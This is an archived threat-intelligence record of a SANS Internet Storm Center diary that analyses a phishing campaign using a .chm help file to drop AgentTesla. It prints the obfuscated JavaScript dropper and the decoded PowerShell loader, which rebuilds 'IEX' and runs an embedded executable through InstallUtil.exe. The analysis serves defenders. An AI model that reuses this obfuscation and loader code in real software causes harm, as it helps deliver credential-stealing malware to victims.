{
	"id": "f436f245-b90c-465e-83e9-b3d63bcecff3",
	"created_at": "2026-04-06T00:13:29.473625Z",
	"updated_at": "2026-04-10T13:12:14.94961Z",
	"deleted_at": null,
	"sha1_hash": "95003febff0b6a46edf9b40554de01c3b5b4e938",
	"title": "AgentTesla Dropped Through Automatic Click in Microsoft Help File",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 105984,
	"plain_text": "AgentTesla Dropped Through Automatic Click in Microsoft Help File\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 21:47:51 UTC\r\nAttackers have plenty of resources to infect our systems. While some files look suspicious because their extension is less common (like .xsl files[1]), others look really safe and make the victim confident enough to open them. I spotted a phishing campaign that delivers a fake invoice. The attached file is a classic ZIP archive, but it contains a .chm file: a Microsoft compiled HTML Help file[2]. The file is named \"INV00620224400.chm\" (sha256:af9fe480abc56cf1e1354eb243ec9f5bee9cac0d75df38249d1c64236132ceab) and has a current VT score of 27/59[3]. If you open this file, you will get a normal help file (the .chm extension is handled by the c:\\windows\\hh.exe tool).\r\nBut you will also see a PowerShell window pop up for a few seconds and then disappear. Let's have a look at the file. You can open .chm files with 7-Zip and browse their content:\r\nhttps://isc.sans.edu/diary/rss/27092\r\nPage 1 of 4\r\nThe sub-directories starting with \"$\" and the files starting with \"#\" are standard components of such archives, but let's have a look at the file called \"sdf48df.htm\". As usual, Microsoft provides tools and file formats that are able to work with dynamic content. This is true for help files, which can embed JavaScript code. Here is the content of the .htm file:\r\n\u003cscript language=\"javascript\"\u003e\r\nvar kldfdf='|!3C|!68|!74|!6D|!6C|!3E|!0A|!3C|!74|!69|!74|!6C|!65|!3E|!20|!43|!75|!73|!74|!6F|!6D|!65\r\n!73|!65|!72|!76|!69|!63|!65|!20|!3C|!2F|!74|!69|!74|!6C|!65|!3E|!0A|!3C|!68|!65|!61|!64|!3E|!0A|!3C|\r\n!61|!64|!3E|!0A|!3C|!62|!6F|!64|!79|!3E|!0A|!0A|!3C|!68|!32|!20|!61|!6C|!69|!67|!6E|!3D|!63|!65|!6E|\r\n[...code removed...]\r\n!72|!45|!61|!63|!68|!2D|!4F|!62|!6A|!65|!63|!74|!20|!7B|!28|!20|!5B|!43|!6F|!6E|!76|!65|!72|!74|!5D|\r\nvar fkodflg =bb0df4(kldfdf)\r\ndocument.write(unescape(fkodflg));\r\nfunction bb0df4(str) {\r\n return str.split(\"|!\").join(\"%\");\r\n}\r\n\u003c/script\u003e\r\nThe variable kldfdf is easy to decode (it's just a hex-encoded chunk of data: bb0df4() turns each \"|!\" back into \"%\" and unescape() does the rest):\r\n\u003chtml\u003e\r\n\u003ctitle\u003e Customer service \u003c/title\u003e\r\n\u003chead\u003e\r\n## Customer service\r\n### Please Wait...\r\n$e00fgfg4=(-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}\r\nsal c0d4s75 $e00fgfg4\r\nfunction AfdEYmOP {  \r\n param($GjruFEh)  \r\n $GjruFEh = $GjruFEh -split '(..)' | ? { $_ }  \r\n ForEach ($aYLEzWVc in $GjruFEh) {    \r\n [Convert]::ToInt32($aYLEzWVc,16)  \r\n }\r\n}\r\n[String]$vhghWAdfB='4D5A9@!@!3@!@!@!04@!@!@!FFFF@!@!B8@!@!@!@!@!@!@!4@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@\r\n[String]$lkgY='1F8B08@!@!@!@!@!04@!CCBD07BC5C45F5387EF7EEEE6DDBDEECEEBB5BDFBB9B7E79FB125228EF2590842A\r\n$dfffgrrr='$b05d.In@@#\u003e@#\u003c\u003c\u003c\u003c\u003c%%%%^^*******\u003e\u003e\u003e\u003c\u003c||||@!!!!!!!@@@@@@@@@ke($null,$null)'.replace('@@#\u003e@#\r\n$jhugrdtf='$dfffgrrr.Lo@@#\u003e@#\u003c\u003c\u003c\u003c\u003c%%%%^^*******\u003e\u003e\u003e\u003c\u003c||||@!!!!!!!@@@@@@@@@($lqct)'.Replace('@@#\u003e@#\u003c\u003c\u003c\u003c\r\n$jhugrdtf| c0d4s75\r\n[Byte[]]$lkgY2= AfdEYmOP $lkgY\r\n[YESS]::f77df00sd('InstallUtil.exe',$lkgY2)\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nSource: https://isc.sans.edu/diary/rss/27092",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://isc.sans.edu/diary/rss/27092"
	],
	"report_names": [
		"27092"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434409,
	"ts_updated_at": 1775826734,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/95003febff0b6a46edf9b40554de01c3b5b4e938.pdf",
		"text": "https://archive.orkl.eu/95003febff0b6a46edf9b40554de01c3b5b4e938.txt",
		"img": "https://archive.orkl.eu/95003febff0b6a46edf9b40554de01c3b5b4e938.jpg"
	}
}